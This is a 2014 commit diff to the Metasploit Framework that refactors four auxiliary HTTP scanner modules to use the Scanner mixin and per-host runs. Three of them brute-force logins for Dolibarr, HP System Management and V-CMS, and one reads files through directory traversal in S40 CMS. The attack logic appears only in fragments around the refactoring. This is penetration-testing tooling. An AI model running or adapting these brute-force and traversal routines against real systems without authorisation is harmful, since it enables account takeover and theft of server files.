modules living inside scanner should include the Scanner mixin

2014-06-12 12:20:44 -05:00 · 2014-06-12 12:20:44 -05:00 · e85f829ee4
parent 67d4097e1d
commit e85f829ee4
4 changed files with 39 additions and 23 deletions
--- a/modules/auxiliary/scanner/http/dolibarr_login.rb
+++ b/modules/auxiliary/scanner/http/dolibarr_login.rb
@ -10,6 +10,7 @@ class Metasploit3 < Msf::Auxiliary
  include Msf::Auxiliary::Report
  include Msf::Exploit::Remote::HttpClient
  include Msf::Auxiliary::AuthBrute
+  include Msf::Auxiliary::Scanner

  def initialize(info = {})
    super(update_info(info,
@ -39,7 +40,7 @@ class Metasploit3 < Msf::Auxiliary
  def get_sid_token
    res = send_request_raw({
      'method' => 'GET',
-      'uri'    => normalize_uri(@uri.path)
+      'uri'    => normalize_uri(@uri)
    })

    return [nil, nil] if res.nil? || res.get_cookies.empty?
@ -62,7 +63,7 @@ class Metasploit3 < Msf::Auxiliary
    #
    sid, token = get_sid_token
    if sid.nil? or token.nil?
-      print_error("#{peer} - Unable to obtain session ID or token, cannot continue")
+      vprint_error("#{peer} - Unable to obtain session ID or token, cannot continue")
      return :abort
    else
      vprint_status("#{peer} - Using sessiond ID: #{sid}")
@ -72,7 +73,7 @@ class Metasploit3 < Msf::Auxiliary
    begin
      res = send_request_cgi({
        'method'   => 'POST',
-        'uri'      => normalize_uri("#{@uri.path}index.php"),
+        'uri'      => normalize_uri("#{@uri}index.php"),
        'cookie'   => sid,
        'vars_post' => {
          'token'         => token,
@ -91,7 +92,7 @@ class Metasploit3 < Msf::Auxiliary
    end

    if res.nil?
-      print_error("#{peer} - Connection timed out")
+      vprint_error("#{peer} - Connection timed out")
      return :abort
    end

@ -116,8 +117,12 @@ class Metasploit3 < Msf::Auxiliary

  def run
    @uri = target_uri.path
-    @uri.path << "/" if @uri.path[-1, 1] != "/"
+    @uri << "/" if @uri[-1, 1] != "/"

+    super
+  end
+
+  def run_host(ip)
    each_user_pass { |user, pass|
      vprint_status("#{peer} - Trying \"#{user}:#{pass}\"")
      do_login(user, pass)
--- a/modules/auxiliary/scanner/http/hp_sys_mgmt_login.rb
+++ b/modules/auxiliary/scanner/http/hp_sys_mgmt_login.rb
@ -10,6 +10,7 @@ class Metasploit3 < Msf::Auxiliary
  include Msf::Auxiliary::Report
  include Msf::Exploit::Remote::HttpClient
  include Msf::Auxiliary::AuthBrute
+  include Msf::Auxiliary::Scanner

  def initialize(info={})
    super(update_info(info,
@ -55,11 +56,11 @@ class Metasploit3 < Msf::Auxiliary
      })

      if not res
-        print_error("#{peer} - Connection timed out")
+        vprint_error("#{peer} - Connection timed out")
        return :abort
      end
    rescue ::Rex::ConnectionError, Errno::ECONNREFUSED
-      print_error("#{peer} - Failed to response")
+      vprint_error("#{peer} - Failed to response")
      return :abort
    end

@ -79,7 +80,7 @@ class Metasploit3 < Msf::Auxiliary
  end


-  def run
+  def run_host(ip)
    if anonymous_access?
      print_status("#{peer} - No login necessary. Server allows anonymous access.")
      return
--- a/modules/auxiliary/scanner/http/s40_traversal.rb
+++ b/modules/auxiliary/scanner/http/s40_traversal.rb
@ -8,6 +8,7 @@ require 'msf/core'
 class Metasploit3 < Msf::Auxiliary

  include Msf::Exploit::Remote::HttpClient
+  include Msf::Auxiliary::Scanner

  def initialize(info = {})
    super(update_info(info,
@ -41,13 +42,13 @@ class Metasploit3 < Msf::Auxiliary
      ], self.class)
  end

-  def run
+  def run_host(ip)
    uri = target_uri.path
    uri << '/' if uri[-1, 1] != '/'

    t = "/.." * datastore['DEPTH']

-    print_status("Retrieving #{datastore['FILE']}")
+    vprint_status("#{peer} - Retrieving #{datastore['FILE']}")

    # No permission to access.log or proc/self/environ, so this is all we do :-/
    uri = normalize_uri(uri, 'index.php')
@ -57,13 +58,14 @@ class Metasploit3 < Msf::Auxiliary
    })

    if not res
-      print_error("Server timed out")
+      vprint_error("#{peer} - Server timed out")
    elsif res and res.body =~ /Error 404 requested page cannot be found/
-      print_error("Either the file doesn't exist, or you don't have the permission to get it")
+      vprint_error("#{peer} - Either the file doesn't exist, or you don't have the permission to get it")
    else
      # We don't save the body by default, because there's also other junk in it.
      # But we still have a SAVE option just in case
-      print_line(res.body)
+      print_good("#{peer} - #{datastore['FILE']} retrieved")
+      vprint_line(res.body)

      if datastore['SAVE']
        p = store_loot(
@ -73,7 +75,7 @@ class Metasploit3 < Msf::Auxiliary
          res.body,
          ::File.basename(datastore['FILE'])
        )
-        print_status("File saved as: #{p}")
+        print_good("#{peer} - File saved as: #{p}")
      end
    end
  end
--- a/modules/auxiliary/scanner/http/vcms_login.rb
+++ b/modules/auxiliary/scanner/http/vcms_login.rb
@ -10,14 +10,15 @@ class Metasploit3 < Msf::Auxiliary
  include Msf::Auxiliary::Report
  include Msf::Exploit::Remote::HttpClient
  include Msf::Auxiliary::AuthBrute
+  include Msf::Auxiliary::Scanner

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'V-CMS Login Utility',
      'Description'    => %q{
-          This module attempts to authenticate to an English-based V-CMS login interface.
-        It should only work against version v1.1 or older, because these versions do not
-        have any default protections against bruteforcing.
+        This module attempts to authenticate to an English-based V-CMS login interface. It
+        should only work against version v1.1 or older, because these versions do not have
+        any default protections against bruteforcing.
      },
      'Author'         => [ 'sinn3r' ],
      'License'        => MSF_LICENSE
@ -31,7 +32,7 @@ class Metasploit3 < Msf::Auxiliary
          File.join(Msf::Config.data_directory, "wordlists", "http_default_users.txt") ]),
        OptPath.new('PASS_FILE',  [ false, "File containing passwords, one per line",
          File.join(Msf::Config.data_directory, "wordlists", "http_default_pass.txt") ]),
-        OptString.new('TARGETURI', [true, 'The URI path to dolibarr', '/vcms2/'])
+        OptString.new('TARGETURI', [true, 'The URI path to V-CMS', '/vcms2/'])
      ], self.class)
  end

@ -39,7 +40,7 @@ class Metasploit3 < Msf::Auxiliary
  def get_sid
    res = send_request_raw({
      'method' => 'GET',
-      'uri'    => @uri.path
+      'uri'    => @uri
    })

    # Get the PHP session ID
@ -52,6 +53,11 @@ class Metasploit3 < Msf::Auxiliary
  def do_login(user, pass)
    begin
      sid = get_sid
+      if sid.nil?
+        vprint_error("#{peer} - Failed to get sid")
+        return :abort
+      end
+
      res = send_request_cgi({
        'uri'    => "#{@uri}process.php",
        'method' => 'POST',
@ -62,9 +68,7 @@ class Metasploit3 < Msf::Auxiliary
          'sublogin' => '1'
        }
      })
-
      location = res.headers['Location']
-
      res = send_request_cgi({
        'uri' => location,
        'method' => 'GET',
@ -87,7 +91,7 @@ class Metasploit3 < Msf::Auxiliary
        return :skip_user
      when /Invalid password/
        vprint_status("#{peer} - Username found: #{user}")
-      else /\<a href="process\.php\?logout=1"\>/
+      when /\<a href="process\.php\?logout=1"\>/
        print_good("#{peer} - Successful login: \"#{user}:#{pass}\"")
        report_auth_info({
          :host        => rhost,
@ -107,8 +111,12 @@ class Metasploit3 < Msf::Auxiliary

  def run
    @uri = normalize_uri(target_uri.path)
-    @uri.path << "/" if @uri.path[-1, 1] != "/"
+    @uri << "/" if @uri[-1, 1] != "/"

+    super
+  end
+
+  def run_host(ip)
    each_user_pass { |user, pass|
      vprint_status("#{peer} - Trying \"#{user}:#{pass}\"")
      do_login(user, pass)